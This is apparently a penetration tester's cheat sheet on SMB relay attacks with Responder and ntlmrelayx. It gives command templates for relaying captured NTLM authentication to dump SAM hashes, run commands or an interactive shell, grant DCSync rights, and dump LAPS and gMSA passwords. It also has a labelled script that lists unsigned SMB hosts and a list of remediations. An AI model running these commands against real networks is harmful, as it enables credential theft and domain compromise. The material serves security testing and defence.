smb relay ntlmrelayx

REQUIREMENTS:

  • SMB signing must not be required on the target (reported by nmap as "enabled but not required" or "disabled"); a host that requires signing will reject the relayed session.

  • The relayed user's credentials must be a local admin on the target machine (needed for the default SAM dump).

Information

Trigger: a victim host initiates an SMB connection to the Kali box (a UNC path of the form \\IP).

  1. responder captures the incoming authentication and passes it to ntlmrelayx

  2. ntlmrelayx relays the authentication to the hosts listed in TARGET.txt

    1. Enables RemoteRegistry

      1. Captures system bootkey

      2. Performs the intended action; default action: SAM dump using secretsdump.py

      3. Restores RemoteRegistry to its previous (disabled) state.

impacket-ntlmrelayx [-6] [-t TARGET | -tf TARGET_FILE] -smb2support [-l LOOT_DIR] [-i] [-e "SHELL.exe"] [-c "COMMANDS"]
# -6: IPv6
# -i: opens an interactive SMB shell; connect to it with nc IP PORT
# --escalate-user USER: adds the Replication-Get-Changes-All ACL for USER on the DC (DCSync rights)
# --dump-laps: dump LAPS passwords
# --dump-gmsa: dump gMSA passwords

SMB-check

nmap --script=smb2-security-mode.nse -p 445 IP/CIDR
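Added example (not part of this note): a small Python script that reads the normal-format output of the nmap check above and lists the hosts where SMB2 signing is not required, i.e. the ones that need the fix below. The embedded nmap output is a constructed sample in the smb2-security-mode script's output format, and the addresses are documentation-range placeholders, not real hosts.

```python
import re

# Constructed sample of nmap smb2-security-mode output (placeholder
# addresses from the 192.0.2.0/24 documentation range; not real hosts).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.0.2.10
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for 192.0.2.11
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.0.2.12
Host is up (0.0009s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing disabled
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# Matches the script's status line, e.g. "|_    Message signing enabled but not required"
SIGNING_RE = re.compile(r"^\|_?\s+Message signing (.+)$")


def parse_signing(nmap_text):
    """Return {host: signing status string} from normal-format nmap output."""
    results = {}
    host = None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = SIGNING_RE.match(line)
        if m and host:
            results[host] = m.group(1).strip()
    return results


def relay_exposed(results):
    """Hosts whose signing is not required: 'enabled but not required' or 'disabled'."""
    return sorted(h for h, s in results.items() if "and required" not in s)


def report(nmap_text):
    """Print one line per host and return the list of hosts needing remediation."""
    results = parse_signing(nmap_text)
    exposed = relay_exposed(results)
    for host, status in sorted(results.items()):
        flag = "FIX" if host in exposed else "ok "
        print(f"[{flag}] {host}: message signing {status}")
    return exposed


if __name__ == "__main__":
    # To use against a real scan: nmap --script=smb2-security-mode -p 445 -oN scan.txt IP/CIDR
    # then report(open("scan.txt").read())
    report(SAMPLE_NMAP_OUTPUT)
```

Only hosts that report "enabled and required" are treated as safe; both "enabled but not required" and "disabled" end up on the remediation list, since a client can simply decline to sign in either case.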

Method:

  1. set SMB=Off and HTTP=Off in /etc/responder/Responder.conf

  2. Run sudo responder -I INTF -rdwv

  3. Run ntlmrelayx.py -tf TARGET.txt -smb2support [FLAGS]

Fix

  • Require SMB signing on all devices (can cause some performance overhead).

  • Disable NTLM authentication on the network where possible.

  • Account tiering (restrict domain admin accounts to specific tasks and hosts, so a relayed credential is not an admin on the target).
